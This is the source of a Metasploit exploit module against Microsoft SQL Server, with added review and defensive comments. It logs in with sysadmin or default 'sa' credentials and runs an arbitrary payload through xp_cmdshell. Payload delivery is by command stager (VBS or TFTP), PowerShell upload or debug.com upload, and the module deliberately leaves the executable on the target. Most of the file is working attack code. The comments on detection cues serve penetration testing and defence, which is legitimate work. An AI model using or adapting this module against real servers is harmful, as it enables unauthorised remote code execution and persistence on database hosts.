Path: blob/master/modules/exploits/windows/mssql/mssql_payload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-authentication payload execution on Microsoft SQL Server through the
# xp_cmdshell stored procedure (every delivery method ends up in
# mssql_xpcmdshell or one of the upload helpers below).
#
# Defensive notes grounded in this file:
# - The Description states, and the cmd path (nodelete: true) confirms, that a
#   payload executable is left on the target's disk when the run finishes.
# - check treats a sysadmin login as the prerequisite for exploitation, so the
#   activity to correlate is xp_cmdshell use under a sysadmin principal, whether
#   it arrives via wscript/VBS (CmdStagerFlavor 'vbs'), PowerShell, or debug.com.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL
  include Msf::Exploit::CmdStager
  include Msf::OptionalSession::MSSQL
  # Alternative stager flavours kept for reference; none of them is active.
  #include Msf::Exploit::CmdStagerDebugAsm
  #include Msf::Exploit::CmdStagerDebugWrite
  #include Msf::Exploit::CmdStagerTFTP

  # Module metadata and options.
  #
  # NOTE(review): 'wcsript.exe' in the Description below looks like a typo for
  # wscript.exe; the Description is a runtime string and is left unchanged here.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server Payload Execution',
      'Description'    => %q{
        This module executes an arbitrary payload on a Microsoft SQL Server by using
        the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.

        First, the original method uses Windows 'debug.com'. File size restrictions are
        avoided by incorporating the debug bypass method presented by SecureStat at
        Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.

        A second method takes advantage of the Command Stager subsystem. This allows using
        various techniques, such as using a TFTP server, to send the executable. By default
        the Command Stager uses 'wcsript.exe' to generate the executable on the target.

        Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
        payload on the target.

        NOTE: This module will leave a payload executable on the target system when the
        attack is finished.
      },
      'Author'         =>
        [
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method
          'jduck' # command stager mods
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # 'sa' password in logs
          [ 'CVE', '2000-0402' ],
          [ 'OSVDB', '557' ],
          [ 'BID', '1281' ],

          # blank default 'sa' password
          [ 'CVE', '2000-1209' ],
          [ 'OSVDB', '15757' ],
          [ 'BID', '4797' ]
        ],
      'Platform'       => 'win',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2000-05-30'
    ))
    # METHOD is required and defaults to 'cmd'; exploit matches it by prefix
    # (cmd / ps / power), anything else falls through to the debug.com upload.
    register_options(
      [
        OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
      ])
  end

  # Vulnerability check.
  #
  # Returns CheckCode::Detected when neither an existing session nor the
  # datastore credentials produce a login, CheckCode::Vulnerable when the
  # login is a sysadmin, and CheckCode::Safe otherwise. The "select @@version"
  # result is discarded; it only exercises the connection before the sysadmin
  # test. The ensure clause disconnects on every path, including early return.
  def check
    if session
      set_mssql_session(session.client)
    end

    unless session || mssql_login_datastore
      vprint_status("Invalid SQL Server credentials")
      return Exploit::CheckCode::Detected
    end

    mssql_query("select @@version", true)
    if mssql_is_sysadmin
      vprint_good "User #{datastore['USERNAME']} is a sysadmin"
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  ensure
    disconnect
  end

  # Callback required by Msf::Exploit::CmdStager (included above): each staged
  # command line is executed through xp_cmdshell. `opts` is part of the
  # CmdStager interface and is not used here; VERBOSE controls output only.
  def execute_command(cmd, opts)
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])
  end

  # Main entry point. Reuses an existing session when one is available,
  # otherwise logs in with the datastore credentials and returns (after a
  # status message) when that fails.
  #
  # NOTE(review): this branch calls set_session(session.client) while check
  # above calls set_mssql_session(session.client) for the same purpose; the two
  # names look inconsistent — confirm which one Msf::OptionalSession::MSSQL
  # actually provides.
  def exploit
    if session
      set_session(session.client)
    else
      unless mssql_login_datastore
        print_status("Invalid SQL Server credentials")
        return
      end
    end

    # METHOD is a required option with a default, so downcase is safe here.
    method = datastore['METHOD'].downcase

    if (method =~ /^cmd/)
      # The wildcard bind address 0.0.0.0 is not usable as the tftphost handed
      # to the stager, so it is replaced by the local source address.
      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
      # nodelete: true — the staged executable is intentionally left behind.
      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
    else
      # Generate the EXE, this is the same no matter what delivery mechanism we use
      exe = generate_payload_exe

      # Use powershell method for payload delivery if specified.
      # Style: `or` instead of `||`; harmless here because both operands are
      # parenthesised, but `||` is the conventional boolean operator.
      if (method =~ /^ps/) or (method =~ /^power/)
        powershell_upload_exec(exe)
      else
        # Otherwise, fall back to the old way (debug.com upload; the Description
        # notes this is unavailable on x64 because it relies on ntvdm).
        mssql_upload_exec(exe, datastore['VERBOSE'])
      end
    end

    handler
    disconnect
  end
end